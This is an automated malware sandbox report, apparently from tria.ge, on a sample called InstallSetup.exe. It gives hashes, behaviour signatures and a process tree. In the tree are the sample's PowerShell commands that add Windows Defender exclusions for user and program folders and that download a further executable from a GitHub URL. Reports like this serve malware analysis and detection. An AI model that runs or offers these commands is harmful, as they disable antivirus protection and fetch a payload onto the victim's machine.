Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

14/03/2025, 13:03

250314-qacneavkv5 10

Analysis

  • max time kernel
    143s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    14/03/2025, 13:03

General

  • Target

    InstallSetup.exe

  • Size

    383KB

  • MD5

    18bc0a0e4aab55b86cd1f41476829918

  • SHA1

    977bd945d4f4a763f36cbcc703029340327d4f40

  • SHA256

    c5a145def78019e54b7f092ff967d25687b4955ec176ce53eab5916d954427be

  • SHA512

    ca5206d805bfccfea6a8ed55911792d12df23fb185dadcb4d3d3a87943f1457d74045f4e611e2e73631c53b6bf10c4d6ef2e38e30686436ccead2fdf1bf72b68

  • SSDEEP

    6144:yjIjZkWXdi1sWAQLYplIZlQ/WvuaentzFIkJLgJUQjyOxyAOzG+RaJs6GN1l:yjIjdiO8clZWeVF9JLgizc+ILk

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\InstallSetup.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallSetup.exe"
    1⤵
    • Downloads MZ/PE file
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2120
    • C:\Users\Admin\AppData\Local\Temp\D6F0.tmp.exe
      "C:\Users\Admin\AppData\Local\Temp\D6F0.tmp.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2896
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\pubilnuf', 'C:\Users', 'C:\ProgramData'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2876
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionPath 'C:\pubilnuf', 'C:\Users', 'C:\ProgramData'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2652
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/vktyhkakwdrg.exe' -OutFile 'C:\pubilnuf\downloaded_file.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1748
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/vktyhkakwdrg.exe' -OutFile 'C:\pubilnuf\downloaded_file.exe'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2620

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    c9e08b08af381b272ad50694147ce963

    SHA1

    30610483b2d14164c0ca318b520453fc0792a0eb

    SHA256

    91c0281debff0bf6e125a423c971f9903dae79a2bdc98aba5657c77f905f175f

    SHA512

    8e9b7957f7f1aa287b0b0f59678c025a33e3324587f9141d6844eab0dd5d799462c7a3e77224edc5849870088ca9a8244031e87a6f8937a56c3408de274065c8

  • \Users\Admin\AppData\Local\Temp\D6F0.tmp.exe

    Filesize

    314KB

    MD5

    c3f1f2f2c303a518b957c6daf9abe66f

    SHA1

    87e5aed6195fb9811ce40a006b8d757c3577a410

    SHA256

    9a2163b925e9ba9aa6e17b0e6c813c36f0dbc3f2b8c6e74d1005553aca99e22c

    SHA512

    651695405631daa70d79a45511795e244d86daa6b9982e561dc5eaa7db167307082d55b2d0b1a0650cbd250e01ff40ab97693b5a257c5d6757265ad1e2e2fccc

  • memory/2620-33-0x000000001B760000-0x000000001BA42000-memory.dmp

    Filesize

    2.9MB

  • memory/2620-34-0x0000000002710000-0x0000000002718000-memory.dmp

    Filesize

    32KB

  • memory/2652-26-0x000000001B740000-0x000000001BA22000-memory.dmp

    Filesize

    2.9MB

  • memory/2652-27-0x0000000002290000-0x0000000002298000-memory.dmp

    Filesize

    32KB